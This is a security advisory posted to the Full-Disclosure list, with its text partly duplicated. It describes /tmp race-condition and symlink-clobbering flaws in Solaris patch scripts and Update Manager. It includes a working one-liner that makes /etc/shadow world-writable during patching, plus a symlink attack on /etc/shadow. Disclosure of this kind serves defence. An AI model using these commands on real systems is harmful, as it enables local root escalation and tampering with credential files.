+= Local Root
If the system administrator is updating the system using update manager or smpatch (multi user mode) a race condition exists with the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won.
vulnerable code in:
./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE
./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE
vulnerable code:
UPGRADE=${TMP}/BIND_UPGRADE
rm -f $UPGRADE
(If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)
cat >> $UPGRADE <<-\_UPDATE_START_METHOD
oset=$@ # Remember current options if any.
svc="svc:network/dns/server"
if [ -z "$TMP" ]; then
TMP="/tmp"
fi
If the following is run:
while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done
during patch installation you can get /etc/shadow world writeable.
+= File Clobbering Vulnerability
If the system administrator is updating the system using update manager or smpatch (multi user mode) a race condition exists with the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won.
vulnerable code in:
./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE
./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE
vulnerable code:
UPGRADE=${TMP}/BIND_UPGRADE
rm -f $UPGRADE
(If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)
cat >> $UPGRADE <<-\_UPDATE_START_METHOD
oset=$@ # Remember current options if any.
svc="svc:network/dns/server"
if [ -z "$TMP" ]; then
TMP="/tmp"
fi
If the following is run:
while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done
during patch installation you can get /etc/shadow world writeable.
+= File Clobbering Vulnerability
Noticed this during routine patching.
/tmp file clobbering vulnerability in Sun Update manager. 7/15/2012
if Solaris Update Manager is run by root and a malicious user creates a symlink in /tmp
larry@n1caragua:/tmp$ ln -s /etc/shadow com.sun.swup.client.LOCK larry@n1caragua:/tmp$ ls -l /etc/shadow -r-------- 1 root sys 0 Jul 19 18:49 /etc/shadow SunOS n1caragua 5.10 Generic_147441-19 i86pc i386 i86pc larry@n1caragua:~$ truss output: 4841/2: stat64("/tmp/com.sun.swup.client.LOCK", 0xD03FEAB0) = 0 4841/2: open64("/tmp/com.sun.swup.client.LOCK", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5
Larry W. Cashdollar
http://vapid.dhs.org @lcashdol
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
